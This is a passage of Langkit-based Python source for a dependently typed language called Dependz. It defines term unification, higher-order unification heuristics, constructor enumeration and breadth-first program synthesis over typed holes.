rhs=t2)\n\n @langkit_property(memoized=True, return_type=T.SyntheticAbstraction)\n def make_abstraction_from_self(id=T.Identifier, rhs=T.Term):\n return SyntheticAbstraction.new(ident=id, term=rhs)\n\n @langkit_property(memoized=True, return_type=T.SyntheticArrow)\n def make_arrow_from_self(t1=T.Term, t2=T.Term,\n t3=(T.Term, No(T.Term))):\n return SyntheticArrow.new(lhs=t1, rhs=t2, binder=t3)\n\n @langkit_property(memoized=True, return_type=T.NestedIntroduction)\n def make_nested_intro_from_self(name=T.Identifier, dom=T.Term,\n bound_generics=T.Symbol.array):\n return NestedIntroduction.new(ident=name, term=dom,\n bound_generics=bound_generics)\n\n @langkit_property(return_type=T.Symbol)\n def unique_fresh_symbol(prefix=T.Symbol):\n return Self.concat_symbol_and_integer(\n prefix,\n Self.unit.root.next_global_integer\n )\n\n @langkit_property(external=True, return_type=T.Int,\n uses_entity_info=False, uses_envs=False)\n def next_global_integer():\n pass\n\n @langkit_property(external=True, return_type=T.Symbol,\n uses_entity_info=False, uses_envs=False)\n def concat_symbol_and_integer(s=T.Symbol, i=T.Int):\n pass\n\n @langkit_property(external=True, return_type=T.LogicVar,\n uses_entity_info=False, uses_envs=False)\n def create_logic_var():\n pass\n\n @langkit_property(external=True, return_type=T.LogicVar,\n uses_entity_info=False, uses_envs=False)\n def create_named_logic_var(name=T.Symbol):\n pass\n\n @langkit_property(external=True, return_type=T.Bool,\n uses_entity_info=False, uses_envs=False)\n def set_allow_orphan_relations(do_allow=T.Bool):\n pass\n\n @langkit_property(return_type=T.Bool)\n def solve_allowing_orphans(equation=T.Equation):\n ignore(Var(Self.set_allow_orphan_relations(True)))\n return equation.solve\n\n @langkit_property(return_type=T.DependzNode, activate_tracing=True)\n def here():\n return Self\n\n @langkit_property(public=True, external=True, return_type=T.Bool,\n uses_entity_info=False, uses_envs=False)\n def dump_mmz_map():\n pass\n\n @langkit_property(return_type=Substitution.array,\n activate_tracing=True)\n def unify_all_with_constraints(queries=UnifyQuery.array,\n domain_constraints=UnifyQuery.array,\n symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n vars = Var(Self.make_logic_var_array)\n ctx = Var(UnificationContext.new(\n symbols=symbols,\n vars=vars,\n self_parent=No(Term),\n other_parent=No(Term)\n ))\n\n query_results = Var(queries.map(\n lambda q: unification_context.bind(\n ctx,\n q.first.unify_equation(q.second)\n )\n ))\n\n equations = Var(And(\n query_results.logic_all(lambda r: r.eq),\n\n unification_context.bind(\n ctx,\n domain_constraints.logic_all(\n lambda q: q.first.has_domain_equation(q.second)\n )\n )\n\n ))\n renamings = Var(query_results.mapcat(lambda r: r.renamings))\n\n return If(\n Try(equations.solve, allow_incomplete),\n\n symbols.map(\n lambda s: Substitution.new(\n from_symbol=s,\n to_term=vars.elem(s).get_value._.cast(Term).rename_all(\n renamings\n )\n )\n ).filter(lambda s: Not(s.to_term.is_null)),\n\n PropertyError(Substitution.array, \"Unification failed\")\n )\n\n @langkit_property(public=True, return_type=Substitution.array,\n activate_tracing=False)\n def unify_all(queries=UnifyQuery.array, symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n return Self.unify_all_with_constraints(\n queries, No(UnifyQuery.array), symbols, allow_incomplete\n )\n\n\n@synthetic\nclass LogicVarArray(DependzNode):\n @langkit_property(return_type=T.LogicVar, memoized=True)\n def elem(s=T.Symbol):\n return Self.create_named_logic_var(s)\n\n\n@abstract\nclass Term(DependzNode):\n annotations = Annotations(custom_trace_image=True)\n\n to_string = AbstractProperty(public=True, type=T.String)\n\n @langkit_property(return_type=T.Term,\n dynamic_vars=[unification_context])\n def solve_time_substitution():\n symbols = Var(unification_context.symbols)\n vars = Var(unification_context.vars)\n\n substs = Var(symbols.map(\n lambda s: Substitution.new(\n from_symbol=s,\n to_term=vars.elem(s).get_value._.cast_or_raise(Term).node\n )\n ).filter(\n lambda s: Not(s.to_term.is_null)\n ))\n\n return Self.substitute_all(substs).normalize\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context])\n def solve_time_substituted_entity():\n return Entity.solve_time_substitution.as_bare_entity\n\n @langkit_property(return_type=T.Bool,\n dynamic_vars=[unification_context],\n activate_tracing=False)\n def unifies_with(other=T.Term):\n current_self = Var(Self.solve_time_substitution.normalize)\n current_other = Var(other.solve_time_substitution.normalize)\n return Try(\n Let(\n lambda substs=current_self.unify(\n current_other,\n unification_context.symbols,\n allow_incomplete=True\n ): True\n ),\n False\n )\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context, extraction_context],\n activate_tracing=False)\n def extract_value():\n first_term = Var(\n extraction_context.first_context.solve_time_substitution.normalize\n )\n second_term = Var(extraction_context.second_context.normalize)\n\n original = Var(\n unification_context.vars.elem(\n extraction_context.target\n ).get_value._.cast_or_raise(Term)\n )\n\n return If(\n Not(original.is_null),\n original,\n Try(\n Let(\n lambda substs=first_term.unify(\n second_term,\n unification_context.symbols,\n allow_incomplete=True\n ): substs.find(\n lambda s: s.from_symbol == extraction_context.target\n ).then(\n lambda s: s.to_term.normalize.as_entity,\n default_val=No(Term.entity)\n )\n ),\n No(Term.entity)\n )\n )\n\n @langkit_property(return_type=T.Equation,\n dynamic_vars=[unification_context])\n def extract_equation(other=T.Term, source=T.Symbol, target=T.Symbol):\n return extraction_context.bind(\n ExtractionContext.new(\n target=target,\n first_context=Self,\n second_context=other\n ),\n Bind(\n unification_context.vars.elem(source),\n unification_context.vars.elem(target),\n conv_prop=Term.extract_value,\n eq_prop=Term.equivalent_entities\n )\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_match_match_equation(other=T.Term):\n return Self.first_order_rigid_rigid_equation(other)\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_match_equation(other=T.Term):\n tmp = Var(unification_context.vars.elem(\n Self.unique_fresh_symbol(\"tmp\")\n ))\n return UnifyEquation.new(\n eq=And(\n Bind(tmp, Self.as_bare_entity,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities),\n Bind(tmp, other.as_bare_entity,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities)\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_flexible_flexible_equation(other=T.Term):\n vars = Var(unification_context.vars)\n self_var = Var(vars.elem(Self.cast(Identifier).sym))\n other_var = Var(vars.elem(other.cast(Identifier).sym))\n\n return UnifyEquation.new(\n eq=If(\n Self.cast(Identifier).sym == other.cast(Identifier).sym,\n LogicTrue(),\n Bind(self_var, other_var)\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_flexible_semirigid_equation(other=T.Term):\n self_sym = Var(Self.cast(Identifier).sym)\n self_var = Var(unification_context.vars.elem(self_sym))\n tmp = Var(unification_context.vars.elem(\n Self.unique_fresh_symbol(\"tmp\")\n ))\n\n return UnifyEquation.new(\n eq=Or(\n And(\n Bind(tmp, other.as_bare_entity),\n Bind(tmp, self_var,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities)\n ),\n And(\n Predicate(Term.unifies_with, self_var, other),\n other.free_symbols.filter(\n lambda s: unification_context.symbols.contains(s)\n ).logic_all(\n lambda s: Self.extract_equation(other, self_sym, s)\n )\n )\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_flexible_rigid_equation(other=T.Term):\n self_var = Var(\n unification_context.vars.elem(Self.cast(Identifier).sym)\n )\n\n return UnifyEquation.new(\n eq=Bind(\n self_var,\n other.as_bare_entity,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context],\n activate_tracing=False)\n def first_order_rigid_rigid_equation(other=T.Term):\n\n def to_logic(bool):\n return If(bool, LogicTrue(), LogicFalse())\n\n def combine(x, y, *others):\n assert (len(others) % 2 == 0)\n\n if len(others) == 0:\n return x.unify_equation(y)\n else:\n return Let(\n lambda\n e1=x.unify_equation(y),\n e2=combine(*others):\n\n UnifyEquation.new(\n eq=And(e1.eq, e2.eq),\n renamings=e1.renamings.concat(e2.renamings)\n )\n )\n\n def unify_case(expected_type, then):\n return other.cast(expected_type).then(\n then,\n default_val=UnifyEquation.new(\n eq=LogicFalse(),\n renamings=No(Renaming.array)\n )\n )\n\n def is_metavar(term):\n return term.cast(Identifier).then(\n lambda id: unification_context.symbols.contains(id.sym)\n )\n\n updated_ctx = Var(UnificationContext.new(\n vars=unification_context.vars,\n symbols=unification_context.symbols,\n self_parent=Self,\n other_parent=other\n ))\n return unification_context.bind(updated_ctx, Self.match(\n lambda id=Identifier: unify_case(\n Identifier,\n lambda oid: UnifyEquation.new(\n eq=to_logic(id.sym == oid.sym),\n renamings=No(Renaming.array)\n )\n ),\n\n lambda ab=Abstraction: unify_case(\n Abstraction,\n lambda o: Let(\n lambda sym=ab.term.free_fresh_symbol(\"eq\", o.term): Let(\n lambda\n rab=ab.term.rename(ab.ident.sym, sym),\n rob=o.term.rename(o.ident.sym, sym):\n\n Let(\n lambda r=rab.unify_equation(rob):\n UnifyEquation.new(\n eq=r.eq,\n renamings=r.renamings.concat(Renaming.new(\n from_symbol=sym,\n to_symbol=ab.ident.sym\n ).singleton)\n )\n )\n )\n )\n ),\n\n lambda ap=Apply: unify_case(\n Apply,\n lambda oap: combine(\n ap.lhs, oap.lhs,\n ap.rhs, oap.rhs\n )\n ),\n\n lambda ar=Arrow: unify_case(\n Arrow,\n lambda oar: Cond(\n And(ar.binder.is_null, oar.binder.is_null),\n combine(ar.lhs, oar.lhs, ar.rhs, oar.rhs),\n\n Or(ar.binder.is_null & Not(oar.has_constraining_binder),\n oar.binder.is_null & Not(ar.has_constraining_binder)),\n Let(\n lambda\n res=combine(ar.lhs, oar.lhs, ar.rhs, oar.rhs),\n unused=Self.make_ident(\n Self.free_fresh_symbol(\"unused\")\n ):\n\n UnifyEquation.new(\n eq=And(\n res.eq,\n Cond(\n ar.binder.is_null & is_metavar(oar.binder),\n Bind(\n unification_context.vars.elem(\n oar.binder.cast(Identifier).sym\n ),\n unused.as_bare_entity\n ),\n\n oar.binder.is_null & is_metavar(ar.binder),\n Bind(\n unification_context.vars.elem(\n ar.binder.cast(Identifier).sym\n ),\n unused.as_bare_entity\n ),\n\n LogicTrue()\n )\n ),\n renamings=res.renamings\n )\n ),\n\n Or(ar.binder.is_null, oar.binder.is_null),\n UnifyEquation.new(\n eq=LogicTrue(),\n renamings=No(Renaming.array)\n ),\n\n combine(\n ar.binder, oar.binder,\n ar.lhs, oar.lhs,\n ar.rhs, oar.rhs\n )\n )\n )\n ))\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_unify_equation(other=T.Term):\n symbols = Var(unification_context.symbols)\n\n def is_match(term):\n return And(\n term.is_match_application,\n term.cast(Apply).rhs.cast(Identifier).then(\n lambda id: symbols.contains(id.sym)\n )\n )\n\n self_is_match = Var(is_match(Self))\n other_is_match = Var(is_match(other))\n\n self_is_metavar = Var(Self.cast(Identifier).then(\n lambda id: symbols.contains(id.sym)\n ))\n other_is_metavar = Var(other.cast(Identifier).then(\n lambda id: symbols.contains(id.sym)\n ))\n\n self_has_metavar = Var(symbols.any(lambda s: Self.is_free(s)))\n other_has_metavar = Var(symbols.any(lambda s: other.is_free(s)))\n\n return Cond(\n self_is_match & other_is_match,\n Self.first_order_match_match_equation(other),\n\n self_is_match,\n Self.first_order_match_equation(other),\n\n other_is_match,\n other.first_order_match_equation(Self),\n\n self_is_metavar & other_is_metavar,\n Self.first_order_flexible_flexible_equation(other),\n\n self_is_metavar & other_has_metavar,\n Self.first_order_flexible_semirigid_equation(other),\n\n other_is_metavar & self_has_metavar,\n other.first_order_flexible_semirigid_equation(Self),\n\n self_is_metavar,\n Self.first_order_flexible_rigid_equation(other),\n\n other_is_metavar,\n other.first_order_flexible_rigid_equation(Self),\n\n Self.first_order_rigid_rigid_equation(other)\n )\n\n @langkit_property(return_type=T.Bool,\n dynamic_vars=[unification_context,\n ho_unification_context],\n activate_tracing=False)\n def higher_order_check_current_solution():\n return Entity.make_apply(\n Self,\n ho_unification_context.arg\n ).unifies_with(\n ho_unification_context.res\n )\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context,\n ho_unification_context])\n def higher_order_construct_imitation():\n res = Var(ho_unification_context.res)\n body = Var(res.solve_time_substitution)\n fresh_sym = Var(body.free_fresh_symbol(\"ho\"))\n\n return Entity.make_abstraction(\n Self.make_ident(fresh_sym),\n body\n ).as_bare_entity\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context,\n ho_unification_context])\n def higher_order_construct_projection():\n arg = Var(ho_unification_context.arg)\n res = Var(ho_unification_context.res)\n fresh_sym = Var(res.free_fresh_symbol(\"ho\"))\n\n return Entity.make_abstraction(\n Self.make_ident(fresh_sym),\n res.solve_time_substitution.anti_substitute(\n arg.solve_time_substitution,\n fresh_sym\n )\n ).as_bare_entity\n\n @langkit_property(return_type=T.UnifyEquation,\n activate_tracing=False,\n dynamic_vars=[unification_context])\n def higher_order_single_arg_equation(arg=T.Term, res=T.Term,\n ho_sym=T.Symbol):\n metavar = Var(unification_context.vars.elem(ho_sym))\n\n ho_ctx = Var(HigherOrderUnificationContext.new(\n arg=arg,\n res=res\n ))\n\n imitate = Var(ho_unification_context.bind(\n ho_ctx,\n Bind(\n metavar,\n Self.as_bare_entity,\n eq_prop=Term.equivalent_entities,\n conv_prop=Term.higher_order_construct_imitation\n )\n ))\n\n project = Var(ho_unification_context.bind(\n ho_ctx,\n Bind(\n metavar,\n Self.as_bare_entity,\n eq_prop=Term.equivalent_entities,\n conv_prop=Term.higher_order_construct_projection\n )\n ))\n\n ignore = Var(ho_unification_context.bind(\n ho_ctx,\n And(\n Predicate(\n Term.higher_order_check_current_solution,\n metavar\n ),\n res.free_symbols.filter(\n lambda s: unification_context.symbols.contains(s)\n ).logic_all(\n lambda s: Self.extract_equation(res, ho_sym, s)\n )\n )\n ))\n\n return UnifyEquation.new(\n eq=Or(\n project,\n ignore,\n imitate,\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=T.UnifyEquation,\n dynamic_vars=[unification_context])\n def higher_order_unify_equation(other=T.Term, ho_term=T.Identifier):\n is_single_arg_equation = Var(And(\n Self.cast(Apply).lhs == ho_term,\n other.is_a(Term)\n ))\n return Cond(\n is_single_arg_equation,\n Self.higher_order_single_arg_equation(\n Self.cast(Apply).rhs,\n other,\n ho_term.sym\n ),\n\n UnifyEquation.new(\n eq=LogicTrue(),\n renamings=No(Renaming.array)\n )\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def unify_equation(other=T.Term):\n symbols = Var(unification_context.symbols)\n\n def outermost_metavar_application_of(term, parent_term):\n return term.cast(Apply)._.left_most_term.cast(Identifier).then(\n lambda id: If(\n # Check the id is indeed a metavariable, and that it's the\n # first time we discover this higher order application.\n # (if it's not, it means term.parent must not be an Apply).\n And(symbols.contains(id.sym),\n Not(parent_term.cast(Apply)._.lhs == term)),\n id,\n No(Identifier)\n )\n )\n\n self_hoa = Var(outermost_metavar_application_of(\n Self, unification_context.self_parent\n ))\n other_hoa = Var(outermost_metavar_application_of(\n other, unification_context.other_parent\n ))\n\n unify_eqs = Var(\n Self.first_order_unify_equation(other).singleton\n .concat(self_hoa.then(\n lambda id:\n Self.higher_order_unify_equation(other, id).singleton\n )).concat(other_hoa.then(\n lambda id:\n other.higher_order_unify_equation(Self, id).singleton\n ))\n )\n\n return UnifyEquation.new(\n eq=unify_eqs.logic_any(lambda eq: eq.eq),\n renamings=unify_eqs.mapcat(lambda eq: eq.renamings)\n )\n\n @langkit_property(return_type=Substitution.array)\n def unify_with_constraints(other=T.Term,\n domain_constraints=UnifyQuery.array,\n symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n return Self.unify_all_with_constraints(\n UnifyQuery.new(first=Self, second=other).singleton,\n domain_constraints,\n symbols,\n allow_incomplete\n )\n\n @langkit_property(public=True, return_type=Substitution.array)\n def unify(other=T.Term, symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n return Self.unify_all(\n UnifyQuery.new(first=Self, second=other).singleton,\n symbols,\n allow_incomplete\n )\n\n @langkit_property(return_type=T.Term, memoized=True)\n def final_result_domain():\n return Self.normalize.match(\n lambda ar=Arrow: ar.rhs.final_result_domain,\n lambda x: x\n )\n\n @langkit_property(return_type=T.Int, memoized=True)\n def param_count():\n return Self.normalize.match(\n lambda ar=Arrow: ar.rhs.param_count + 1,\n lambda _: 0\n )\n\n @langkit_property(return_type=T.Term.array)\n def call_args():\n return Self.match(\n lambda ap=Apply: ap.lhs.call_args.concat(ap.rhs.singleton),\n lambda _: No(Term.array)\n )\n\n @langkit_property(return_type=T.Bool, public=True)\n def is_call_to(sym=T.Symbol, left_args=T.Int):\n return Self.match(\n lambda i=Identifier: (i.sym == sym) & (left_args == 0),\n lambda ap=Apply: ap.lhs.is_call_to(sym, left_args - 1),\n lambda _: False\n )\n\n @langkit_property(return_type=T.Term.array)\n def find_calls_to(sym=T.Symbol, args=T.Int):\n return Self.match(\n lambda ap=Apply: ap.lhs.find_calls_to(sym, args).concat(\n ap.rhs.find_calls_to(sym, args)\n ),\n lambda ar=Arrow: ar.lhs.find_calls_to(sym, args).concat(\n ar.rhs.find_calls_to(sym, args)\n ).concat(ar.binder._.find_calls_to(sym, args)),\n lambda ab=Abstraction: ab.term.find_calls_to(sym, args),\n lambda _: No(Term.array)\n ).concat(Self.is_call_to(sym, args).then(\n lambda _: Self.singleton\n ))\n\n @langkit_property(return_type=T.Constructor.array)\n def constructors_impl(constructors=T.Introduction.array,\n generics=T.Symbol.array,\n domain_constraints=(UnifyQuery.array,\n No(UnifyQuery.array))):\n return constructors.map(\n lambda c: c.as_template(c.ident)\n ).mapcat(\n lambda c: Let(\n lambda inst=c.instance.final_result_domain:\n\n Try(\n Let(\n lambda substs=Self.unify_with_constraints(\n inst,\n domain_constraints,\n c.new_symbols.concat(generics),\n allow_incomplete=True\n ):\n\n Constructor.new(\n template=Template.new(\n origin=c.origin,\n instance=c.instance.substitute_all(substs),\n new_symbols=c.new_symbols.filter(\n lambda sym: Not(substs.any(\n lambda subst: subst.from_symbol == sym\n ))\n )\n ),\n substs=substs\n ).singleton\n ),\n No(Constructor.array)\n )\n )\n )\n\n @langkit_property(return_type=T.Constructor.array.array)\n def grouped_constructors_impl(constrs=T.Constructor.array, i=T.Int):\n filtered = Var(constrs.filter(\n lambda c:\n (c.template.instance.param_count +\n c.template.new_symbols.length) == i\n ))\n not_filtered = Var(constrs.filter(\n lambda c:\n (c.template.instance.param_count +\n c.template.new_symbols.length) != i\n ))\n return filtered.singleton.concat(\n not_filtered.then(\n lambda rest: Self.grouped_constructors_impl(rest, i + 1)\n )\n )\n\n @langkit_property(return_type=T.Constructor.array.array)\n def grouped_constructors(constructors=T.Introduction.array,\n generics=T.Symbol.array,\n domain_constraints=UnifyQuery.array):\n return Self.grouped_constructors_impl(\n Self.constructors_impl(constructors, generics, domain_constraints),\n 0\n )\n\n @langkit_property(public=True, return_type=T.Term.entity.array)\n def constructors():\n normed = Var(Self.normalize)\n generics = Var(normed.free_symbols)\n\n ignore(Var(Cond(\n normed.is_a(Arrow),\n PropertyError(T.Bool, \"Cannot list constructors of arrow types\"),\n\n normed.is_a(Abstraction),\n PropertyError(T.Bool, \"Abstractions are not valid domains\"),\n\n True\n )))\n\n intros = Var(Self.unit.root.cast(Program).all_constructors)\n\n return normed.constructors_impl(intros, generics).map(\n lambda c: c.template.origin.as_bare_entity\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_abstraction():\n ar = Var(Self.cast_or_raise(Arrow))\n\n sym = Var(Self.unique_fresh_symbol(ar.binder._.cast(Identifier).then(\n lambda id: id.sym,\n default_val=\"x\"\n )))\n id = Var(Self.make_ident(sym))\n\n body_attempt = Var(ar.binder.then(\n lambda b: b.cast(Identifier).then(\n lambda i: i.intro.then(\n lambda _: ar.rhs,\n default_val=ar.rhs.substitute(i.sym, id)\n ),\n default_val=PropertyError(\n Term, \"Non-identifier binders are not handled yet.\"\n )\n ),\n default_val=ar.rhs\n ).then(\n lambda rhs: synthesis_context.bind(\n SynthesisContext.new(\n intros=synthesis_context.intros.concat(\n Self.make_nested_intro(\n name=id, dom=ar.lhs,\n bound_generics=synthesis_context.bound_generics\n ).cast(Introduction).singleton\n ),\n bound_generics=synthesis_context.bound_generics\n ),\n rhs.synthesize_impl\n )\n ))\n\n return SynthesizationAttempt.new(\n term=Self.make_abstraction(id, body_attempt.term),\n holes=body_attempt.holes,\n free_symbols=body_attempt.free_symbols\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_apply_arrow(built=T.Term, ar=T.Arrow):\n binder = Var(ar.binder)\n\n is_introduced = Var(binder.then(\n lambda b: b.free_symbols.all(\n lambda s: synthesis_context.intros.any(\n lambda i: i.ident.sym == s\n )\n )\n ))\n\n arg = Var(If(\n is_introduced,\n SynthesizationAttempt.new(\n term=binder,\n holes=No(SynthesizationHole.array),\n free_symbols=No(T.Symbol.array)\n ),\n synthesis_context.bind(\n SynthesisContext.new(\n intros=synthesis_context.intros,\n bound_generics=synthesis_context.bound_generics.concat(\n ar.lhs.free_symbols.filter(\n lambda s:\n Not(synthesis_context.bound_generics.contains(s))\n )\n )\n ),\n ar.lhs.synthesize_impl\n )\n ))\n\n new_built = Var(Self.make_apply(built, arg.term))\n\n rhs_type = Var(If(\n binder.is_null | is_introduced,\n ar.rhs,\n ar.rhs.substitute(\n binder.cast(Identifier).then(\n lambda b: b.sym,\n default_val=PropertyError(\n Symbol, \"Non-identifier binders are not handled yet.\"\n )\n ),\n arg.term\n )\n ))\n\n rec = Var(Self.synthesize_apply(new_built, rhs_type))\n\n return SynthesizationAttempt.new(\n term=rec.term,\n holes=rec.holes.concat(arg.holes),\n free_symbols=rec.free_symbols\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_apply(built=T.Term, callee_type=T.Term):\n return callee_type.match(\n lambda ar=Arrow:\n Self.synthesize_apply_arrow(built, ar),\n\n lambda _: SynthesizationAttempt.new(\n term=built,\n holes=No(SynthesizationHole.array),\n free_symbols=No(T.Symbol.array)\n )\n )\n\n @langkit_property(return_type=Constructor.array,\n dynamic_vars=[synthesis_context],\n activate_tracing=True)\n def synthesizable_constructors(generics=T.Symbol.array,\n domain_constraints=UnifyQuery.array):\n intros = Var(\n Self.unit.root.cast(Program).all_constructors\n .concat(synthesis_context.intros)\n )\n\n return Self.grouped_constructors(\n intros, generics, domain_constraints\n ).mapcat(\n lambda constrs: constrs\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_impl():\n return Self.normalize.match(\n lambda ar=Arrow: ar.synthesize_abstraction,\n lambda ab=Abstraction: PropertyError(\n SynthesizationAttempt, \"Abstractions are not valid domains\"\n ),\n lambda other: Let(\n lambda hole=Self.make_ident(Self.unique_fresh_symbol(\"hole\")):\n\n SynthesizationAttempt.new(\n term=hole,\n holes=SynthesizationHole.new(\n sym=hole.sym,\n domain_val=other,\n ctx=synthesis_context\n ).singleton,\n free_symbols=No(T.Symbol.array)\n )\n )\n )\n\n @langkit_property(return_type=SynthesizationHole.array)\n def updated_hole_set(original_holes=SynthesizationHole.array,\n substs=T.Substitution.array,\n potential_emerging_holes=T.Identifier.array,\n index=(T.Int, 0)):\n h = Var(original_holes.at(index))\n\n subst = Var(substs.find(lambda s: s.from_symbol == h.sym))\n is_replaced = Var(Not(subst.is_null))\n\n emerging_holes = Var(If(\n is_replaced,\n potential_emerging_holes.filter(\n lambda id: subst.to_term.is_free(id.sym)\n ),\n No(T.Identifier.array),\n ))\n\n rest_potential_emerging_holes = Var(potential_emerging_holes.filter(\n lambda h: Not(emerging_holes.contains(h))\n ))\n\n updated_ctx = Var(SynthesisContext.new(\n intros=h.ctx.intros.map(\n lambda i: Self.make_nested_intro(\n name=i.ident,\n dom=i.term.substitute_all(substs),\n bound_generics=h.ctx.bound_generics\n ).cast(Introduction)\n ),\n bound_generics=h.ctx.bound_generics\n ))\n\n return Cond(\n Not(is_replaced),\n\n SynthesizationHole.new(\n sym=h.sym,\n domain_val=h.domain_val.substitute_all(substs),\n ctx=updated_ctx\n ).singleton,\n\n emerging_holes.length > 0,\n emerging_holes.map(\n lambda id: SynthesizationHole.new(\n sym=id.sym,\n domain_val=id.domain_val,\n ctx=updated_ctx\n )\n ),\n\n No(SynthesizationHole.array)\n ).concat(If(\n index == original_holes.length - 1,\n No(SynthesizationHole.array),\n Self.updated_hole_set(\n original_holes,\n substs,\n rest_potential_emerging_holes,\n index + 1\n )\n ))\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context],\n activate_tracing=True)\n def construct_attempt(from_attempt=SynthesizationAttempt,\n from_hole=SynthesizationHole, constr=Constructor):\n\n dom = Var(from_hole.domain_val)\n\n atp = Var(dom.synthesize_apply(\n constr.template.origin,\n constr.template.instance\n ))\n\n substs = Var(Substitution.new(\n from_symbol=from_hole.sym,\n to_term=atp.term\n ).singleton.concat(constr.substs))\n\n updated_holes = Var(Self.updated_hole_set(\n atp.holes.concat(from_attempt.holes),\n substs,\n constr.template.new_symbols.mapcat(\n lambda s: Self.make_ident(s).then(\n lambda id: If(\n Not(id.domain_val.is_null),\n id.cast(Identifier).singleton,\n No(Identifier.array)\n )\n )\n )\n ))\n\n return SynthesizationAttempt.new(\n term=from_attempt.term.substitute_all(substs, unsafe=True),\n holes=updated_holes,\n free_symbols=from_attempt.free_symbols.filter(\n lambda sym: Not(substs.any(lambda s: s.from_symbol == sym))\n ).concat(\n constr.template.new_symbols.filter(\n lambda s: Not(updated_holes.any(lambda h: h.sym == s))\n )\n )\n )\n\n @langkit_property(return_type=SynthesizationAttempt.array,\n activate_tracing=True)\n def synthesize_attempt(attempt=SynthesizationAttempt,\n origin=T.Introduction):\n first_hole = Var(attempt.holes.at(0))\n free_syms = Var(\n attempt.holes.map(lambda h: h.sym).concat(attempt.free_symbols)\n )\n\n hole_constraints = Var(\n attempt.holes.filter(\n lambda h: first_hole.domain_val.is_free(h.sym)\n ).map(\n lambda h: UnifyQuery.new(\n first=Self.make_ident(h.sym),\n second=h.domain_val\n )\n )\n )\n\n constrs = Var(synthesis_context.bind(\n first_hole.ctx,\n first_hole.domain_val.synthesizable_constructors(\n free_syms,\n hole_constraints\n )\n ))\n\n return synthesis_context.bind(first_hole.ctx, constrs.mapcat(\n lambda constr: Try(\n Self.construct_attempt(attempt, first_hole, constr).singleton,\n No(SynthesizationAttempt.array)\n )\n ))\n\n @langkit_property(return_type=T.Term)\n def synthesize_breadth_first_search(attempts=SynthesizationAttempt.array,\n origin=T.Introduction, depth=T.Int):\n result = Var(attempts.find(lambda atp: atp.holes.length == 0))\n return Cond(\n Not(result.is_null),\n result.term,\n\n depth == 0,\n attempts.at(0).term,\n\n Self.synthesize_breadth_first_search(\n attempts.mapcat(\n lambda atp: Self.synthesize_attempt(atp, origin)\n ),\n origin,\n depth - 1\n )\n )\n\n @langkit_property(return_type=T.Term)\n def sanitize_synthesization(from_term=T.Term):\n arrow_type = Var(from_term.cast(Arrow))\n binder = Var(arrow_type._.binder.cast(Identifier))\n abs = Var(Self.cast(Abstraction))\n return If(\n Not(abs.is_null) & Not(binder.is_null),\n Self.make_abstraction(\n binder,\n abs.term.substitute(\n abs.ident.sym, binder\n ).sanitize_synthesization(arrow_type.rhs)\n ),\n Self\n )\n\n @langkit_property(public=True, return_type=T.Term)\n def synthesize(origin=(T.Introduction, No(T.Introduction))):\n return synthesis_context.bind(\n SynthesisContext.new(\n intros=No(Introduction.array),\n bound_generics=Self.free_symbols\n ),\n Self.synthesize_breadth_first_search(\n Self.synthesize_impl.singleton,\n origin,\n 10\n )\n )._.sanitize_synthesization(Self)\n\n @langkit_property(public=True, return_type=T.Symbol.array, memoized=True)\n def free_symbols(deep=(T.Bool, False)):\n return Self.free_symbols_impl(deep, 0)\n\n @langkit_property(public=True, return_type=T.Symbol.array)\n def free_symbols_impl(deep=T.Bool, cur_depth=T.Int):\n def combine(l, r):\n return l.concat(r.filter(\n lambda s: Not(l.contains(s))\n ))\n\n def rec(node, inc_depth, then):\n return Let(\n lambda l=node.free_symbols_impl(\n deep, (cur_depth + 1) if inc_depth else cur_depth\n ): then(l)\n )\n\n return Self.match(\n lambda id=Identifier: id.intro.then(\n lambda _: No(T.Symbol.array),\n default_val=id.sym.singleton\n ),\n\n lambda ab=Abstraction:\n ab.term.free_symbols_impl(deep, cur_depth).filter(\n lambda s: s != ab.ident.sym\n ),\n\n lambda ap=Apply: rec(\n ap.lhs, False,\n lambda l: rec(\n ap.rhs, False,\n lambda r: combine(l, r)\n )\n ),\n\n lambda ar=Arrow: If(\n And(Not(deep), cur_depth > 0),\n No(T.Symbol.array),\n rec(\n ar.lhs, True,\n lambda l: rec(\n ar.rhs, False,\n lambda r: ar.binder.then(\n lambda b: rec(\n b, False,\n lambda 